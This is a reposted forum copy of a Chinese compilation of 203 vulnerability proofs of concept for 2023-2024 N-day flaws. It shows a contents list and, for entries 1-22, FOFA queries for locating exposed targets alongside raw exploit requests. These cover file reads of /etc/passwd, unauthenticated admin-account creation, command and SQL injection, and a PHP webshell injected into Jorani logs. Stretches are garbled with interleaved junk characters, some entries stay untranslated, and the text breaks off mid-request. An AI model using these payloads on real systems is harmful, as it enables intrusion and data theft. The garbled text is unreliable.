Collection of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06 (repost)
Posted on 2024-6-5 14:31:29
Collection of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article originates from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and we hope this article helps with defense. Defenders can use its contents to triage risk in their own environments.

Sources: the article covers 203 POCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites on the internet and compiled for publication by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation plans, contact the product vendor.

Content: due to length constraints, a few POCs that were too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if the content infringes any party's legal rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To simplify things and make browsing easier, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 (Phicomm) router RCE
9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT management platform arbitrary file read
21. 大华 ICC intelligent IoT management platform random remote code execution
22. 大华 ICC intelligent IoT management platform log4j remote code execution
23. 大华 ICC intelligent IoT management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 (DPTech) VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 (Newcapec) 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信 (QiAnXin) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg settings information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达 (Glodon) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 (Hongjing) EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 (Founder) omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 (Phicomm) router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, perform the following operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


! ~* I( t+ _7 M7 F: r; y2 J9. 稻壳CMS keyword 未授权SQL注入# q( u4 e9 k+ E  g5 _6 ]2 E, O
FOFA:app="Doccms"
% [& G! T/ [+ O+ ]; ]4 yGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1( f9 l# s9 K2 s$ O- y/ L
Host: x.x.x.x
2 R3 L3 u, O& `) _3 m  j) {. B* M$ m' P7 Q: u: o' X

) z; g; Y+ ^$ i& {payload为下列语句的二次Url编码) R" {+ _$ O5 m/ R

, M! c2 k: E% n9 C2 F' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
# V* j9 V; V/ X0 j' u6 r$ h* ^9 [7 @( y5 |1 o
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' T8 m8 a4 F+ Y9 W: T
FOFA:icon_hash="953405444"
* b" x5 ^, D% O  Q% i! K5 E( g. U4 Z( ~  {
文件上传后响应中包含上传文件的路径' m# m; q: C5 o. I- N3 J1 b
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
; X3 B2 T7 P4 }Host: x.x.x.x:xx
, A0 s3 K+ ^; K5 N; ?. S6 X' M1 h4 ]) ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+ J# U  c/ g" D/ j& ?9 d7 K( e8 gContent-Length: 197/ V- q6 n; _# P1 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.91 z& z; a  t6 r' Y/ N" K
Accept-Encoding: gzip, deflate! T# T- R0 k+ B4 _
Accept-Language: zh-CN,zh;q=0.9$ W* y2 S! A; b4 w: {1 {
Connection: close
( m5 [  h& v7 W$ J0 kContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
* J$ |+ c& q- H* N; G& ~; P0 I# `+ O
5 [2 `# @0 g  r' `7 L------WebKitFormBoundaryxdgaqmqu
! L+ s, [' N- d) p9 X" `Content-Disposition: form-data; name="file"filename="icfitnya.txt"% G0 _; P" h! F4 |5 [& J* Y' q
Content-Type: text/html$ M1 n4 V. ~8 g0 g8 b% `

( c6 }7 u0 l+ r; t& Djmnqjfdsupxgfidopeixbgsxbf' P6 }3 F  R, _3 i
------WebKitFormBoundaryxdgaqmqu--) d' k$ ]4 [; G

% j! u' D. H% y" X) @
. B/ J  L: L* O2 }" p11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入: o$ ~" v  H5 @! E/ B. ^
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"0 B# T+ b, [7 @2 [% p
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
/ l4 Y) l1 @9 e5 r8 lHost: 127.0.0.1
5 z. `& H9 `. c) i8 \Pragma: no-cache
" g: X' K9 g7 z2 NCache-Control: no-cache  D$ D0 ~3 i$ p9 A0 X5 \# _+ F5 g0 `
Upgrade-Insecure-Requests: 1
# v9 P+ O/ D2 }9 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 l$ U1 b- {3 k+ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; H) I8 P8 a! n, F% X; O% HAccept-Encoding: gzip, deflate* m+ C" V4 |( `+ ~% h* P
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8/ G) s  j5 S7 Y
Connection: close* }' u* h8 M2 ?: _% n9 ~
: }. q- A! I% `6 h% o2 O2 G0 x
3 w2 J6 ^+ g6 {4 `9 Z8 @/ R
12. Jorani < 1.0.2 远程命令执行. |: ?* m6 v% g$ D
FOFA:title="Jorani"2 s; |% a; Z4 p; U, P" A
第一步先拿到cookie+ J3 I1 Q3 a3 M' Z, P9 y
GET /session/login HTTP/1.1$ E" N8 Q2 v% N+ q2 w9 z
Host: 192.168.190.30
4 S: S9 X! g7 x$ V$ H8 Y- v3 B4 sUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
4 v/ f. M9 q, O# h4 KConnection: close/ v8 F0 W2 G: V0 ?2 Y" j
Accept-Encoding: gzip
' V7 r7 J$ @# Q; k/ }. B  ]8 J. h# c0 u( |9 \8 ~+ {
8 N8 o& y% Z: t0 E6 K* E
响应中csrf_cookie_jorani用于后续请求
, B' @+ l& B0 l; ^HTTP/1.1 200 OK+ \) o3 q: [" u5 e5 l
Connection: close) p) h$ Q+ a. D2 w
Cache-Control: no-store, no-cache, must-revalidate8 I0 Q5 A8 ?- g6 |( u8 H1 v, p
Content-Type: text/html; charset=UTF-8& |" b6 A/ L0 L# h+ R
Date: Tue, 24 Oct 2023 09:34:28 GMT2 o# h9 H! z. p5 {2 T4 d. ^; T
Expires: Thu, 19 Nov 1981 08:52:00 GMT
8 E0 S1 t1 C- ~$ }& u$ bLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT, F& e. w$ M# t- h9 J" M: H* B
Pragma: no-cache4 q3 n" f+ m+ Q0 H" U
Server: Apache/2.4.54 (Debian)
" j0 O4 y9 _. w3 y! J+ M4 \Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
. Y$ L( {) Q( gSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
- S: j% L- x8 b3 z) u0 f1 @) ~Vary: Accept-Encoding+ K: k" E5 b. J$ P
* g1 c7 |) O# y' E( q6 p
% D! x4 u/ h2 B3 F: c
POST请求,执行函数并进行base64编码
3 u% s5 I5 k6 [& |POST /session/login HTTP/1.1  ?9 j4 Q6 c: W3 R
Host: 192.168.190.30
/ ?* v# d1 G" j  T6 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36& d4 P% m. d% r6 |4 z2 q' G
Connection: close
5 w3 O  P8 \3 T9 s6 qContent-Length: 252/ T% h7 _0 t# X! V1 u8 G" X
Content-Type: application/x-www-form-urlencoded
: S* a0 d" d! @$ N" f, e+ LCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r. \% i: G% V, @- i* ?+ f
Accept-Encoding: gzip* V% E2 W. O5 }

* a% @5 c& L$ T+ x' G: qcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor" p: T3 Q' N" F7 l$ _6 R
% Y& I: s7 o1 l! f$ P% S
: d6 ~/ ^' c) x: \+ i
; ]1 H+ N( n" |, n  |
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
; w9 T) H6 ^/ [4 \1 O3 _GET /pages/view/log-2023-10-24 HTTP/1.1  Z8 R8 W+ ?' T5 j: Y9 s
Host: 192.168.190.30) E6 K3 e- {; o4 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36) r4 u) A# B2 z- x4 V
Connection: close" o/ ^/ K' {9 A+ U0 G( z5 a
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 K7 W- a! g/ x: u( l
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=( b' {7 X& w1 a5 d
X-REQUESTED-WITH: XMLHttpRequest
8 K6 R; ]5 M& z$ b$ v& Y7 v- ~Accept-Encoding: gzip9 ?+ `3 _- n( b) [/ l) A- c
* V# Z) v& u8 H1 H

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华ICC智能物联综合管理平台任意文件读取# R$ Z7 u8 I) d/ A" n" O
FOFA:body="*客户端会小于800*"
4 T( N/ u- ]8 gGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
( z5 M$ w6 d  r7 S7 DHost: x.x.x.x
1 g3 L! V4 D. ~% g! SUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ d9 D9 ]# ]4 g: Q+ p; q0 c. RConnection: close
. ~9 S( _1 M7 ~% uAccept: */*
: N6 C) C6 p7 o& M- nAccept-Language: en% Z! v4 h; I1 l/ U
Accept-Encoding: gzip6 l6 `' S3 L/ _+ W9 u% O7 i$ X

) m& D, `& N' X* A. P1 o: h; H
% X6 O/ f# e$ P' b# \  b) r+ s21. 大华ICC智能物联综合管理平台random远程代码执行
& X' S- G8 s5 T" v; }FOFA:icon_hash="-1935899595"
7 x) v& o& Q! S1 _6 ]6 EPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
1 H" U$ {3 w/ s( ]  Q4 }Host: x.x.x.x
' q- ~, n% A3 U) i  x; S& UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& D; A, a0 b% ZContent-Length: 161. u# y4 r6 G, ?; _3 y8 b& e
Accept-Encoding: gzip; I" H3 q, y' O( Q4 _# w
Connection: close) q1 `; I, E) ?$ H
Content-Type: application/json;charset=utf-8& F6 `& Z7 ?1 z9 I; m( {5 _

/ E# E5 p% R) l/ A, C{
& V( G; D: e) l/ M6 J& N% E"a":{9 W  h% d9 L) h3 R+ j# F
   "@type":"com.alibaba.fastjson.JSONObject",7 z# M6 I/ s3 |
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}5 H6 |, C; _8 w) |
  }""
0 _8 v/ c1 p8 A  h% h}
- [: t6 k& i) J, M7 X' n, ^' M. L: _! y0 Q! [/ s$ P$ Z

3 ?* N: M! G) M- j  [  ]22. 大华ICC智能物联综合管理平台 log4j远程代码执行, c/ h  o3 V" P' z: ]
FOFA:icon_hash="-1935899595"
, H/ C3 E  t1 z9 gPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1  P' a6 l! a. E1 j  s; d! v4 k
Host: your-ip6 y* g' J# [3 H( U4 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 P- l0 S$ N" d6 V
Content-Type: application/json;charset=utf-8
